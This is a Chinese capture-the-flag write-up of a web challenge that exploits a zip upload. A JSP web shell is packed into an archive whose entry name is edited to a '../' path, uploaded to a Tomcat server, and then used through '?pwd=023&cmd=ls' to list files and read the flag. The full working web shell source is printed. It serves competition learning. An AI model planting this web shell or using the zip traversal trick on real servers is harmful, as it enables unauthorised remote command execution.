第三届金盾信安杯网络安全大赛_web_上传你的压缩包吧

上传你的压缩包吧

文章目录

  • 上传你的压缩包吧
    • 解题过程
    • 参考链接

解题过程

打开容器,可以进行文件上传,到需要是压缩包
第三届金盾信安杯网络安全大赛_web_上传你的压缩包吧_第1张图片

随便上传一个压缩包,得到上传文件路径

:/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;

比赛当时的思路是在一个博客上看到的,链接为ctf 文件上传总结_njqfb的博客-CSDN博客_ctf文件上传总结

第三届金盾信安杯网络安全大赛_web_上传你的压缩包吧_第2张图片

我们可以将一个木马压缩为zip文件,然后用010editor修改几个字符(目录穿越),那么就可以在zip上一级目录生成木马文件

网上找的jsp一句话木马,利用方式为?pwd=023&cmd=ls

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
"
);}else{out.println(":-)");}%>

添加到sk1y.zip,然后010editor进行修改,将其一前一后的sk1y.jsp使用调整为目录穿越 ,sk1y.jsp改为 ../y.jsp

第三届金盾信安杯网络安全大赛_web_上传你的压缩包吧_第3张图片

然后上传该压缩包

在这里插入图片描述

然后访问

url/y.jsp?pwd=023&cmd=ls

在这里插入图片描述

木马可以正常运行之后,根据我们之前测试的zip文件上传回显的目录位置,进行搜索

测试压缩包的回显
/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;

查看目录,发现flag.jsp
在这里插入图片描述

然后查看该文件,即可得到flag
在这里插入图片描述

但是有个问题,就是压缩包目录穿越的原理还不是很懂,之后理解的话会继续更新
未完待续——

参考链接

  1. ctf 文件上传总结_njqfb的博客-CSDN博客_ctf文件上传总结

你可能感兴趣的:(比赛wp,Web,CTF,web安全)